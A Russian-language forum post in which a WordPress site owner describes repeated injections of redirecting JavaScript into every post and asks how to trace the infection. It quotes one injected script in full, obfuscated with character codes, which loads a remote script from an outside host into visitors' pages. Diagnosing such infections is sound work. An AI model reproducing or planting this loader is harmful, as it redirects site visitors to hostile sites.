Регулярные заражения WordPress-сайта javacript-переадресациями
Имеется сайт, с последними обновлениями: самого WordPress и плагинов. Тема самописная - никаких уязвимостей не содержит - в ней вообще ничего лишнего нет. Установлен и хорошенько настроен плагин безопасности iThemes security.
Практически 1 раз в 7-10 дней происходит регулярное заражение всех записей (таблица posts) - по сути в конец каждой записи добавляется строчки подключения javascript'а - переадресующего на сайте посетителя на другие сайты или просто такие вот конструкции:
<script type=text/javascript>Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
вирусный javascript каждый раз видоизменяется, иногда просто подключается внешний файл, а иногда такая вот шифровка как выше...
Все файлы сайта, плагинов, ядра WordPress без изменений - проверял и сравнивал с дозараженными копиями сайта. Обновлял всё и вся как только можно и нельзя. В базе никаких особых признаков нет. WP_CRON переключил на серверный.
Что делать? Как определить заразу? Копаться в логах SQL и GET запросов?
p.s.: а ха да все доступы менял по кругу несколько раз: администратора WP, FTP, MySQL, компьютер с которого осуществляет доступ в админку один - проверялся двумя антивирусниками, браузер переустанавливался.